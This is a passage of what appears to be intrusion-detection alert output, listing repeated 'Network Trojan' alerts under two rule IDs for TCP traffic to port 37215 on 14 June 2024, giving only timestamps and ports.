                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072725
                SID:2829579
                Source Port:43726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677183
                SID:2829579
                Source Port:57980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985429
                SID:2835222
                Source Port:54710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424258
                SID:2829579
                Source Port:33576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969529
                SID:2829579
                Source Port:46354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325748
                SID:2835222
                Source Port:36120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991672
                SID:2835222
                Source Port:50456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722553
                SID:2835222
                Source Port:60448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148861
                SID:2829579
                Source Port:46120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762106
                SID:2835222
                Source Port:50616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968638
                SID:2829579
                Source Port:35864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941962
                SID:2829579
                Source Port:53920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135194
                SID:2829579
                Source Port:38784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686691
                SID:2835222
                Source Port:52960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546729
                SID:2829579
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342985
                SID:2835222
                Source Port:53956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881708
                SID:2835222
                Source Port:41418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725407
                SID:2835222
                Source Port:51746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050793
                SID:2835222
                Source Port:34912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449240
                SID:2835222
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504869
                SID:2829579
                Source Port:45498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615208
                SID:2835222
                Source Port:56626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666730
                SID:2829579
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779005
                SID:2835222
                Source Port:60034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940636
                SID:2829579
                Source Port:60844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381745
                SID:2835222
                Source Port:49794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762143
                SID:2835222
                Source Port:50158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152028
                SID:2829579
                Source Port:41880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968191
                SID:2829579
                Source Port:60734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.142947
                SID:2829579
                Source Port:55410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701415
                SID:2835222
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667466
                SID:2829579
                Source Port:53024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681890
                SID:2835222
                Source Port:50216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980214
                SID:2835222
                Source Port:47108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074277
                SID:2829579
                Source Port:60704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200187
                SID:2829579
                Source Port:48810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965879
                SID:2835222
                Source Port:55816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675803
                SID:2835222
                Source Port:55450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848007
                SID:2835222
                Source Port:51318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276326
                SID:2829579
                Source Port:47960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861383
                SID:2829579
                Source Port:50738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977861
                SID:2829579
                Source Port:59034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702313
                SID:2829579
                Source Port:55910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177865
                SID:2829579
                Source Port:51720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384585
                SID:2829579
                Source Port:35346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386174
                SID:2829579
                Source Port:49126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518168
                SID:2829579
                Source Port:41470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567315
                SID:2835222
                Source Port:38342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052252
                SID:2835222
                Source Port:60866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675324
                SID:2829579
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671313
                SID:2829579
                Source Port:56508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989842
                SID:2829579
                Source Port:45198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183893
                SID:2835222
                Source Port:53694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734696
                SID:2835222
                Source Port:42422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790892
                SID:2835222
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807388
                SID:2829579
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250855
                SID:2835222
                Source Port:54916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699175
                SID:2835222
                Source Port:47400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451222
                SID:2835222
                Source Port:57806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339678
                SID:2835222
                Source Port:52990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812828
                SID:2829579
                Source Port:35938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846879
                SID:2835222
                Source Port:59282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564979
                SID:2829579
                Source Port:40402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899180
                SID:2835222
                Source Port:58692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666573
                SID:2835222
                Source Port:35666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325408
                SID:2829579
                Source Port:38972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381474
                SID:2835222
                Source Port:57324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966095
                SID:2835222
                Source Port:35398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341374
                SID:2829579
                Source Port:51022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810699
                SID:2829579
                Source Port:58258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979805
                SID:2835222
                Source Port:59382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017387
                SID:2835222
                Source Port:41212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564534
                SID:2829579
                Source Port:44346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641522
                SID:2835222
                Source Port:46434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521546
                SID:2829579
                Source Port:35756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846642
                SID:2829579
                Source Port:37258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723855
                SID:2835222
                Source Port:54856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452610
                SID:2829579
                Source Port:56144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134193
                SID:2835222
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914268
                SID:2829579
                Source Port:46540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971362
                SID:2829579
                Source Port:45024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701973
                SID:2829579
                Source Port:38060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969655
                SID:2829579
                Source Port:37144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999920
                SID:2829579
                Source Port:44556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143523
                SID:2829579
                Source Port:51060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031868
                SID:2829579
                Source Port:41550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000494
                SID:2835222
                Source Port:41330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410428
                SID:2829579
                Source Port:59120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322043
                SID:2835222
                Source Port:41390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518363
                SID:2829579
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182180
                SID:2835222
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325235
                SID:2835222
                Source Port:40948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679704
                SID:2835222
                Source Port:39044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134998
                SID:2829579
                Source Port:47040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364623
                SID:2829579
                Source Port:52770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022201
                SID:2835222
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715763
                SID:2835222
                Source Port:41458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149626
                SID:2829579
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812290
                SID:2835222
                Source Port:47484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420690
                SID:2829579
                Source Port:55004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336824
                SID:2835222
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827476
                SID:2835222
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848840
                SID:2829579
                Source Port:47946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225596
                SID:2835222
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618204
                SID:2835222
                Source Port:51772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547466
                SID:2829579
                Source Port:57720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245902
                SID:2835222
                Source Port:48526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913739
                SID:2835222
                Source Port:44314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735393
                SID:2829579
                Source Port:41600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132992
                SID:2829579
                Source Port:42230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944112
                SID:2829579
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915559
                SID:2835222
                Source Port:35668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726886
                SID:2835222
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878243
                SID:2829579
                Source Port:57050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342950
                SID:2835222
                Source Port:42390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423654
                SID:2829579
                Source Port:41174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881299
                SID:2829579
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022573
                SID:2829579
                Source Port:35128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792818
                SID:2835222
                Source Port:58858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971137
                SID:2829579
                Source Port:54564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452430
                SID:2829579
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779257
                SID:2835222
                Source Port:42588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471575
                SID:2835222
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131736
                SID:2829579
                Source Port:55976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661950
                SID:2829579
                Source Port:46274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164732
                SID:2835222
                Source Port:51506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809995
                SID:2829579
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966779
                SID:2835222
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385605
                SID:2835222
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451113
                SID:2829579
                Source Port:49864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369186
                SID:2829579
                Source Port:33262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160780
                SID:2829579
                Source Port:38448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916915
                SID:2829579
                Source Port:57462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384563
                SID:2835222
                Source Port:39472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616253
                SID:2835222
                Source Port:42252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971413
                SID:2835222
                Source Port:44888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615991
                SID:2829579
                Source Port:53828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812260
                SID:2835222
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230191
                SID:2835222
                Source Port:38340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246207
                SID:2829579
                Source Port:50998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246021
                SID:2829579
                Source Port:39758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421692
                SID:2829579
                Source Port:54250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804913
                SID:2835222
                Source Port:51974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984617
                SID:2835222
                Source Port:42196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967973
                SID:2835222
                Source Port:49356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201565
                SID:2829579
                Source Port:35134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776069
                SID:2835222
                Source Port:59624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367026
                SID:2835222
                Source Port:55042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968956
                SID:2835222
                Source Port:52464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326358
                SID:2835222
                Source Port:47078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704378
                SID:2835222
                Source Port:52782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381776
                SID:2829579
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705589
                SID:2835222
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451741
                SID:2829579
                Source Port:39064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275811
                SID:2835222
                Source Port:41820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779772
                SID:2829579
                Source Port:53728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765183
                SID:2835222
                Source Port:50816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425151
                SID:2829579
                Source Port:50400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519013
                SID:2835222
                Source Port:41726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274929
                SID:2829579
                Source Port:58178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019972
                SID:2829579
                Source Port:41634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034319
                SID:2835222
                Source Port:54042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722379
                SID:2829579
                Source Port:45888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184836
                SID:2829579
                Source Port:47156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942098
                SID:2829579
                Source Port:44310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.320005
                SID:2829579
                Source Port:54242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735368
                SID:2835222
                Source Port:45930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199917
                SID:2835222
                Source Port:45462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971536
                SID:2835222
                Source Port:59804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025697
                SID:2835222
                Source Port:60424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943811
                SID:2829579
                Source Port:60492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675424
                SID:2829579
                Source Port:58974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295150
                SID:2835222
                Source Port:49592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202028
                SID:2829579
                Source Port:58556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810053
                SID:2829579
                Source Port:43670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472779
                SID:2835222
                Source Port:43758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803535
                SID:2829579
                Source Port:60732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616089
                SID:2829579
                Source Port:39786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917918
                SID:2829579
                Source Port:55910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792307
                SID:2829579
                Source Port:56810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470607
                SID:2829579
                Source Port:50838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425132
                SID:2829579
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614591
                SID:2835222
                Source Port:34454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828751
                SID:2829579
                Source Port:48514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290633
                SID:2829579
                Source Port:58906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793123
                SID:2835222
                Source Port:47510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056143
                SID:2835222
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246061
                SID:2829579
                Source Port:51360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913620
                SID:2829579
                Source Port:59676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968999
                SID:2829579
                Source Port:54050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789594
                SID:2829579
                Source Port:41140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727567
                SID:2835222
                Source Port:49402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409526
                SID:2829579
                Source Port:38104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502566
                SID:2829579
                Source Port:46340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143054
                SID:2835222
                Source Port:57788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412158
                SID:2835222
                Source Port:34510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762409
                SID:2829579
                Source Port:37390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
